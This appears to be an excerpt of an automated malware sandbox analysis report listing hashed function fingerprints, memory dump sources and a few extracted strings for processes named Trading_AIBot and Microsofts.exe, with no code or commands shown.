Opcode ID: 3d3bebc629b32a5e9eb98c35cc41536b893b583d41df56c1d563cb2716839a16
Instruction ID: 11c5e1ad84146303dcb13447fb91703383ba02547a2a1a411d1a8887f2adc489
Opcode Fuzzy Hash: 3d3bebc629b32a5e9eb98c35cc41536b893b583d41df56c1d563cb2716839a16
Instruction Fuzzy Hash: FFB2BE70E112689FCB64EF68C894A9DBBB2BF49304F5085E9D41DA7364DB325E86CF40

Function 02B70839 Relevance: .6, Instructions: 608COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2183024292.0000000002B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2b70000_Trading_AIBot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b5d2e9691e1fcb8c4b57295f9bfdf47d25fe40c44dabad1e8f71b35063af333
Instruction ID: 2e06f5e798b63f9a261cbb7443185ff4fa5efdf66f7ae81f6c604d4b4354a1f9
Opcode Fuzzy Hash: 2b5d2e9691e1fcb8c4b57295f9bfdf47d25fe40c44dabad1e8f71b35063af333
Instruction Fuzzy Hash: 8462BC74A01219DFDB64EF68D994B9DBBB2FB49304F1084E9D40AA7365DB316E82CF40

Function 02B70848 Relevance: .6, Instructions: 601COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2183024292.0000000002B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2b70000_Trading_AIBot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a51b92d35754855ccf3fe093c99b2c086b1f3d80bf5fd9ad30190e35443c240d
Instruction ID: f5badbadd3e55bbb71f2091f3727e26a8f78efbc2056593ef204248c801559ae
Opcode Fuzzy Hash: a51b92d35754855ccf3fe093c99b2c086b1f3d80bf5fd9ad30190e35443c240d
Instruction Fuzzy Hash: CE62BC74A01219DFDB64DF68D994B9DBBB2FB49304F1084E9D40AA7355DB316E82CF40

Function 02B77A79 Relevance: .4, Instructions: 416COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2183024292.0000000002B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2b70000_Trading_AIBot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e988a5e14b09650864c588f5758c29c8e86826c3b235d87b430e39e057c5c65
Instruction ID: dedc3f3c874a50764825f9443260edbe1799c4ebb18185c6cc77ad3b205128b0
Opcode Fuzzy Hash: 6e988a5e14b09650864c588f5758c29c8e86826c3b235d87b430e39e057c5c65
Instruction Fuzzy Hash: 3641EDB0D04288DFCB14DFEAC984A9EFFF5AF49300F24846AE454AB260DB349985CF40

Function 02B767EF Relevance: .2, Instructions: 224COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2183024292.0000000002B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2b70000_Trading_AIBot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30881e7e28f0c31b26b7c3960ad1c3123337d3c7e87951c3f817c1f2689971c4
Instruction ID: 37ef790ba1fd851828120d065a760af6ecf8830ef0a230372fe42f48838f65c1
Opcode Fuzzy Hash: 30881e7e28f0c31b26b7c3960ad1c3123337d3c7e87951c3f817c1f2689971c4
Instruction Fuzzy Hash: 34B1A974E012289FEB64DF68C984B9DBBB2BB49304F1085E9D40DA7355DB30AE86CF51

Function 02B765B0 Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2183024292.0000000002B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2b70000_Trading_AIBot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b1e8cad1ca7456d0e5479f91ffd19723ff9cb730bb2809752a5b1c90710fbc0e
Instruction ID: d2640fdb681704d4501224ebe253e6426c4e35fb4599dbf8dd0f546ff1c569c7
Opcode Fuzzy Hash: b1e8cad1ca7456d0e5479f91ffd19723ff9cb730bb2809752a5b1c90710fbc0e
Instruction Fuzzy Hash: 6951FE78D04208EFDF54DFE8D4946ECBBF6AB49304F10906AE829AB394DB345906CF10

Function 02B77D10 Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2183024292.0000000002B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2b70000_Trading_AIBot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7f6ceb1e6cf582ceca60f6e761a322ce0bda9a9e7d27bb6a29b86edf17f68ab
Instruction ID: 8818d2bb6edebb0cb17839dfc0f8e1e85c1003a58014af3047a344da55dfbe31
Opcode Fuzzy Hash: d7f6ceb1e6cf582ceca60f6e761a322ce0bda9a9e7d27bb6a29b86edf17f68ab
Instruction Fuzzy Hash: 2D41DEB0D00258DFDB14DFAAC584ADEFFF5AF48310F24806AE418AB264DB749985CF54

Function 02B773B0 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2183024292.0000000002B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2b70000_Trading_AIBot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97e71d5fe768338a413f22627eded03a81d9d9f4ae63cf6c74b5929b6ecd3d8f
Instruction ID: 83ee5c97e766f186b3ffda85461f757e4bf0ed7ccb7188cdf7e7a63476ca1a52
Opcode Fuzzy Hash: 97e71d5fe768338a413f22627eded03a81d9d9f4ae63cf6c74b5929b6ecd3d8f
Instruction Fuzzy Hash: 4C21D275E002099FCB09DBB4D451AEEB7B2EF89300F1094A9D415B7390DB36AD42CF65

Function 02B773AF Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2183024292.0000000002B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2b70000_Trading_AIBot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab748d20c9b1c9146bfc4c13a078d336ee62615fa087822b8a2c8e98f6814664
Instruction ID: 24e0daff86adb612390f265a0f2c76ce39b86cc38968bded41ed08d9e8df329d
Opcode Fuzzy Hash: ab748d20c9b1c9146bfc4c13a078d336ee62615fa087822b8a2c8e98f6814664
Instruction Fuzzy Hash: 6C21D275E002099FCB19DBB4D491AEEB7B2EF89300F2094A9D415B7390DB36AD46CF61

Function 02B75213 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2183024292.0000000002B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2b70000_Trading_AIBot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3cf09533aedb66ff387dc132328c9b381212cc1d86af9d7981aa4756bfc808e4
Instruction ID: ea392e5cb14c374aa44b5ea1b216688cc11f80c881858f6c85d0439cc631782e
Opcode Fuzzy Hash: 3cf09533aedb66ff387dc132328c9b381212cc1d86af9d7981aa4756bfc808e4
Instruction Fuzzy Hash: 4D115B70D093858FCB16AFB494583AEBFB0EF46305F1858EAD491A31A2CB781645CB51

Function 02B75238 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2183024292.0000000002B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2b70000_Trading_AIBot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c43e0354c2479951652dd877ddd2da85c27afa8f81f454e32dd1aba5cac01e7
Instruction ID: a2aa94bc71b3d6d0f75845caa0ddb353dc5492d6d13980cf7263e490928a0faf
Opcode Fuzzy Hash: 6c43e0354c2479951652dd877ddd2da85c27afa8f81f454e32dd1aba5cac01e7
Instruction Fuzzy Hash: 1C017874C00209DFCB54EFB8C10C7AEBBB4EB05306F1098AA9825A3290DB780684CF91

Function 02B76C3E Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2183024292.0000000002B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2b70000_Trading_AIBot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9ebd5bb210dd881a754f22093541485b6419146eba80e39f36ca25ed470c49f
Instruction ID: d729591a9179e6aea2c01cd08f68d0cd08b672999a16cef5bde85fc402464f7d
Opcode Fuzzy Hash: c9ebd5bb210dd881a754f22093541485b6419146eba80e39f36ca25ed470c49f
Instruction Fuzzy Hash: 9FF0F878940255CFCB64DFB4D4487ACBBB4EF4A312F1465AAD519A3260CB309985CF14

Function 02B76757 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2183024292.0000000002B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2b70000_Trading_AIBot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8f0331674af26bae048178581427cdf8ae6e5023e4b4c8ec22bcf81c89bfdb6
Instruction ID: e3587b8725ab016bb29be211ea1f6f892ab95af4507ac6a1cbfca0674b48b57a
Opcode Fuzzy Hash: c8f0331674af26bae048178581427cdf8ae6e5023e4b4c8ec22bcf81c89bfdb6
Instruction Fuzzy Hash: FEE02271941248DFDB45EFB0DA1A69DBF7AEB00300F1095AED80AA7761CB300F08EB40

Function 02B7767A Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2183024292.0000000002B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2b70000_Trading_AIBot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 312206bf4e7446832095b117f5ba03d2442bb9fbb7e46a7b77985e37ea4575b7
Instruction ID: 931cfacb864eaef9957b5ba836825adfe46ce46224512edd9d3c4d2fc9aef88e
Opcode Fuzzy Hash: 312206bf4e7446832095b117f5ba03d2442bb9fbb7e46a7b77985e37ea4575b7
Instruction Fuzzy Hash: 22E0C2A2D452448BCB808EB8380A7B8BF64CF57231F4013E8DA6443259EB218513A661

Function 02B774A7 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2183024292.0000000002B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2b70000_Trading_AIBot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d59ab1e699a446de68373c23b79ea43c54ab4ffb856004d578254a9f9053387
Instruction ID: 08d7c36d9ccbbe711362b84aa339c58ab8dfac2acb0667ac95b12862f2364875
Opcode Fuzzy Hash: 9d59ab1e699a446de68373c23b79ea43c54ab4ffb856004d578254a9f9053387
Instruction Fuzzy Hash: 4FE0ED74E101049FCB54EF78E588A98BFB1EB09311F1042E9D90993369DB319946CB40

Function 02B774A8 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2183024292.0000000002B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2b70000_Trading_AIBot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11c0c38d0aaed66541839ea6cb66ad6b1ed96fbcf797ad85f49b8570440125d9
Instruction ID: e7184a3fb0b72b3ed337e60484b2923b1a450b123fe5e958e6c75ad734cef042
Opcode Fuzzy Hash: 11c0c38d0aaed66541839ea6cb66ad6b1ed96fbcf797ad85f49b8570440125d9
Instruction Fuzzy Hash: 04E04878E00204DFC744EF78E548A59BFB5FB09711F1041E9D90893368DB309D45CB40

Function 02B77642 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2183024292.0000000002B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2b70000_Trading_AIBot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a8f27e2f5b7d39f92b34ee50714f47111aeaa57801a958957443c8495d8f7a7
Instruction ID: 281989f1c821f39024fa3d064c5dc3c0bb75617f825dd92ceb5aa3e8ae4f0de8
Opcode Fuzzy Hash: 1a8f27e2f5b7d39f92b34ee50714f47111aeaa57801a958957443c8495d8f7a7
Instruction Fuzzy Hash: 15E0C22194C3C44FC75287B82816BA87F35CF03221F0402EAD094871A2CA21041ADB11

Function 02B76768 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2183024292.0000000002B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2b70000_Trading_AIBot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc8543535a540a83fb619681f644350dea40301debbb34fd45670931ddea36f4
Instruction ID: 37b9294d2cf236b1915fa6f78d618915626f9c4abc1794e0ae34b05d11488c9b
Opcode Fuzzy Hash: fc8543535a540a83fb619681f644350dea40301debbb34fd45670931ddea36f4
Instruction Fuzzy Hash: F0E08671941208EFCB40EFB4E60565DB7BDEB04304F1085A8D515A3214DF311F44DB80

Function 02B76D40 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2183024292.0000000002B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2b70000_Trading_AIBot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92cc65507cd42b74e351680b052d5e8b4d45263bfeca1cd9a4ca9f477ea0d16e
Instruction ID: 87bd0d68741fbc207b098fc4fa537fdc56b97be63065695b4e821588cfc46735
Opcode Fuzzy Hash: 92cc65507cd42b74e351680b052d5e8b4d45263bfeca1cd9a4ca9f477ea0d16e
Instruction Fuzzy Hash: CCD02E2080A2808FC30B8BA47A05BA47F3CCB03302F2912DBE06A635A2CB300A18C361

Function 02B77650 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2183024292.0000000002B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2b70000_Trading_AIBot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 669a78e839da5ca2a8d6249bab122af110479907148c2eb73b314ce322f911e8
Instruction ID: 33499a406e9cb0e15e43d6b7faf484877e5ccb63ce186483b3f4521eacd2a8d6
Opcode Fuzzy Hash: 669a78e839da5ca2a8d6249bab122af110479907148c2eb73b314ce322f911e8
Instruction Fuzzy Hash: 77C012709412099BC650DAA8A405B59BA6CDB02315F401298A51852204DF7155509695

Function 02B76D50 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2183024292.0000000002B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2b70000_Trading_AIBot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0afa30134ccc2b0d8d62a5c3d38b4382839eb6fca970eb001137a2515e8c5073
Instruction ID: 21928f8c1d9f09f5303fe91447bf716f141743e3c474832c55a16cf0fbc4eb91
Opcode Fuzzy Hash: 0afa30134ccc2b0d8d62a5c3d38b4382839eb6fca970eb001137a2515e8c5073
Instruction Fuzzy Hash: D4C08C70C413099BC364DFEAB408B69BB7CE702316F0012A9EA2853204EF715550D7E6

Analysis Process: Microsofts.exePID: 2124, Parent PID: 8160COMMON

Execution Graph

Execution Coverage:	13.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	8.2%
Total number of Nodes:	49
Total number of Limit Nodes:	5

Executed Functions

Function 04B97770 Relevance: 12.2, Strings: 9, Instructions: 913COMMON

Download Yara Rule

Strings

(o^q, xrefs: 04B977AE
(o^q, xrefs: 04B97895
(o^q, xrefs: 04B97C7F
(o^q, xrefs: 04B97932
,bq, xrefs: 04B97C10
(o^q, xrefs: 04B97869
(o^q, xrefs: 04B97C8F
,bq, xrefs: 04B97C20
(o^q, xrefs: 04B97D41

Memory Dump Source

Source File: 00000013.00000002.2986606833.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_4b90000_Microsofts.jbxd

Similarity

API ID:
String ID: (o^q$(o^q$(o^q$(o^q$(o^q$(o^q$(o^q$,bq$,bq
API String ID: 0-2735749406
Opcode ID: 8d135ebd4a96fff95361bde1e9b504b9adafa6ab1d05d51527482f6eaa43edf3
Instruction ID: c81ddd674b869deaf847c9385a7aee360e7ac15eb0e534b06c2c86dddfa02c5d
Opcode Fuzzy Hash: 8d135ebd4a96fff95361bde1e9b504b9adafa6ab1d05d51527482f6eaa43edf3
Instruction Fuzzy Hash: 28820730A10609DFCF18DF68C984AAABBF2FF89314F1585A9E4559B2A1DB31FD41CB50

Function 04B96998 Relevance: 9.7, Strings: 7, Instructions: 988COMMON

Download Yara Rule

Strings

,bq, xrefs: 04B9730A
(o^q, xrefs: 04B972A0
,bq, xrefs: 04B97318
(o^q, xrefs: 04B975BD
Hbq, xrefs: 04B96E22
(o^q, xrefs: 04B96F56
(o^q, xrefs: 04B97292

Memory Dump Source

Source File: 00000013.00000002.2986606833.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_4b90000_Microsofts.jbxd

Similarity

API ID:
String ID: (o^q$(o^q$(o^q$(o^q$,bq$,bq$Hbq
API String ID: 0-1608600535
Opcode ID: aaf79567dd87c66e28709aa6e911306aae684a6c777c24c4bdd8946e67febbbf
Instruction ID: 85cfa52a515c04f46f0ba11d976201cad3d12e53ba75bbd9e14c72d07c916055
Opcode Fuzzy Hash: aaf79567dd87c66e28709aa6e911306aae684a6c777c24c4bdd8946e67febbbf
Instruction Fuzzy Hash: 1A823A71A10219DFCF14DF69C894AAEBBF6FF88300F1585A9E4159B2A1DB30ED46CB50

Function 04B91C58 Relevance: 2.7, Strings: 2, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PH^q, xrefs: 04B91E92
PH^q, xrefs: 04B91EA3

Memory Dump Source

Source File: 00000013.00000002.2986606833.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_4b90000_Microsofts.jbxd

Similarity

API ID:
String ID: PH^q$PH^q
API String ID: 0-1598597984
Opcode ID: 87c63700c10f09f57b961e95dd0eab08efede9e5292292578284d032bff46aa4
Instruction ID: a1b02928579ce7a313c7025a248169b2de8dbc6e31545857c4edb6ee334702ba
Opcode Fuzzy Hash: 87c63700c10f09f57b961e95dd0eab08efede9e5292292578284d032bff46aa4
Instruction Fuzzy Hash: A281D074E00219CFEB18DFAAD99479DBBF2BF89300F20846AD419AB354EB346945DF50

Function 0245C168 Relevance: 2.0, APIs: 1, Instructions: 530
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000013.00000002.2957831520.0000000002450000.00000040.00000800.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2450000_Microsofts.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd53522e652401d8b5b074a33623b518a7bf9697500c91e5e11ffca731a6d5bf
Instruction ID: 1f77be413a0850edf8e53a4ab3579f3f865769f2d346e74a2eeab4bc7bf5364c
Opcode Fuzzy Hash: fd53522e652401d8b5b074a33623b518a7bf9697500c91e5e11ffca731a6d5bf
Instruction Fuzzy Hash: 93224F74E00229CFCB14DFA9D984B9DBBB2BF88304F10856AE849AB355DB749985CF50

Function 04B94500 Relevance: .7, Instructions: 745COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2986606833.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_4b90000_Microsofts.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f39b0c05aa4e1ae11f9396270febe1d1114512357fe22c76ec7287c4b12a7034
Instruction ID: 152f2d2be87e4149c0729d31df815d7eedf29a9b68379a848f238ecc1ba1dedd
Opcode Fuzzy Hash: f39b0c05aa4e1ae11f9396270febe1d1114512357fe22c76ec7287c4b12a7034
Instruction Fuzzy Hash: E9827C74E012288FDB64DF69D998BDDBBB2BB89300F1081EAD40DA7265DB315E85DF40

Function 04B915F8 Relevance: .3, Instructions: 296COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2986606833.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_4b90000_Microsofts.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e984b356b0cf24eff068c6a56a46814db9dfc05c9d3b14d77a7e5f4aa227c80
Instruction ID: 151a19067c757afb4cf86e47054299dc12f44491190d39e91b22e59b902aed62
Opcode Fuzzy Hash: 0e984b356b0cf24eff068c6a56a46814db9dfc05c9d3b14d77a7e5f4aa227c80
Instruction Fuzzy Hash: 3DE1C274E01218CFEB14DFA5C944B9DBBB2BF89304F2081AAD408A73A5DB755E86DF11

Function 04B9ED80 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2986606833.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_4b90000_Microsofts.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5cd0b0ff5e4c2db7e87506abd95f646d588a6bdf43ab280a22fd1a9d7b712cd
Instruction ID: 6e2a7175763b79193f5b222e234db1fe74ff619e50df42db2086a2a598fab9c3
Opcode Fuzzy Hash: c5cd0b0ff5e4c2db7e87506abd95f646d588a6bdf43ab280a22fd1a9d7b712cd
Instruction Fuzzy Hash: A2C1A274E00218CFDB14DFA5C954B9DBBB2AF89304F2084A9D409AB365DB359E86CF50

Function 04B915EA Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2986606833.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_4b90000_Microsofts.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa3d9eb2898215457cde15615d83d4046a8162c250c4246d9a0595f45be11713
Instruction ID: 29658b6fcc9a5d82cb55da1d1fd70fbfee89fdc1ddfbd0bad64103657d14b407
Opcode Fuzzy Hash: aa3d9eb2898215457cde15615d83d4046a8162c250c4246d9a0595f45be11713
Instruction Fuzzy Hash: 4C41D2B0E002198BEB18DFAAD8547DEBBF2BF89304F14C1AAC418BB254DB355946CF14

Function 04B9ED70 Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2986606833.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_4b90000_Microsofts.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 712da895f0455ebfdd595e08195779562cb470b98743a0b81ff9c4acd7ddebf4
Instruction ID: c5a521a0db02d128b558333b01d1b518251d971e65f6c03843b61cc97999daac
Opcode Fuzzy Hash: 712da895f0455ebfdd595e08195779562cb470b98743a0b81ff9c4acd7ddebf4
Instruction Fuzzy Hash: BD41D470E01218CBEB18DFAAD9406DEBBF2AF89300F24D17AD418AB265DB345946CF54

Function 04B98848 Relevance: 4.6, Strings: 3, Instructions: 820
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 04B9938F
(o^q, xrefs: 04B99549
$^q, xrefs: 04B9936C

Memory Dump Source

Source File: 00000013.00000002.2986606833.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_4b90000_Microsofts.jbxd

Similarity

API ID:
String ID: (o^q$$^q$$^q
API String ID: 0-27156697
Opcode ID: 0d7ad422151965f43fa953640f8600ef0a52f6236490de508d613bb55840a41f
Instruction ID: 58dc9cef01a2d261c9173def6ffe8701af35a2d011e41992e206aa605ed30b42
Opcode Fuzzy Hash: 0d7ad422151965f43fa953640f8600ef0a52f6236490de508d613bb55840a41f
Instruction Fuzzy Hash: E5727470A00218CFEF54DBA4C990B9EBBB6EF98300F1081ADD50A6B3A5DE35AD45DF51

Function 04B965F1 Relevance: 2.7, Strings: 2, Instructions: 226
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

,bq, xrefs: 04B966E0
,bq, xrefs: 04B966D6

Memory Dump Source

Source File: 00000013.00000002.2986606833.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_4b90000_Microsofts.jbxd

Similarity

API ID:
String ID: ,bq$,bq
API String ID: 0-2699258169
Opcode ID: e4143b651bd756b581c791c6bcb169c5c6b7af3d7ec29c98d6a3a2ddc734862b
Instruction ID: f470c798549fdda57fc7936153f17e8b96d2ea5bb11e6d3a76192e2f0e6a7265
Opcode Fuzzy Hash: e4143b651bd756b581c791c6bcb169c5c6b7af3d7ec29c98d6a3a2ddc734862b
Instruction Fuzzy Hash: E0814975B001058FCF14CF69C888AAABBF2FF89344B1585BAD8159B3A5DA35FC41CB91

Function 04B92508 Relevance: 2.7, Strings: 2, Instructions: 210
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(&^q, xrefs: 04B92623
(bq, xrefs: 04B926E2

Memory Dump Source

Source File: 00000013.00000002.2986606833.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_4b90000_Microsofts.jbxd

Similarity

API ID:
String ID: (&^q$(bq
API String ID: 0-1294341849
Opcode ID: 4418264129bd4447040c9e5a62130a478a48c4ce0f8329c5cbbb8f697a0c8c83
Instruction ID: b276cc92e79658e07a032bd992905bec0df1eab4a919022a2e2989dcbe161c84
Opcode Fuzzy Hash: 4418264129bd4447040c9e5a62130a478a48c4ce0f8329c5cbbb8f697a0c8c83
Instruction Fuzzy Hash: 1D715E31F002199BDF19EFA9D8506AE7BF6AF85700F148569E405AB380DF30AD46CB95

Function 04B96130 Relevance: 2.7, Strings: 2, Instructions: 181
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hbq, xrefs: 04B9625E
Hbq, xrefs: 04B9622B

Memory Dump Source

Source File: 00000013.00000002.2986606833.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_4b90000_Microsofts.jbxd

Similarity

API ID:
String ID: Hbq$Hbq
API String ID: 0-4258043069
Opcode ID: fe722f325b17d164619956b61fc87b9c3fa71bc9df32ae08499ea46075632d37
Instruction ID: 8763a3b137e3c7d553eab86bd0ceaaa7a0abf643dfb1e519aa35fd97fb9dcd6a
Opcode Fuzzy Hash: fe722f325b17d164619956b61fc87b9c3fa71bc9df32ae08499ea46075632d37
Instruction Fuzzy Hash: 8651D5317042559FDF199F68D854BAE7BF2FF88304F1885AAE8458B291DB38EC12C790

Function 0245C76C Relevance: 1.6, APIs: 1, Instructions: 62
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(00000000), ref: 0245C8AE

Memory Dump Source

Source File: 00000013.00000002.2957831520.0000000002450000.00000040.00000800.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2450000_Microsofts.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1d5a5e1226fbf66eab5f5a10659d96e27ad82b62354cbb04da52cd0564281340
Instruction ID: e28cb8e6ca45b5e0fa68d0e8e5c72cabbe1c976557f74a4688c92b913b1dd869
Opcode Fuzzy Hash: 1d5a5e1226fbf66eab5f5a10659d96e27ad82b62354cbb04da52cd0564281340
Instruction Fuzzy Hash: 5D117CB4E012289FDB04DFA9D4C4AADBBB5FB88305F54D527EC44E7242DB74A981CB60

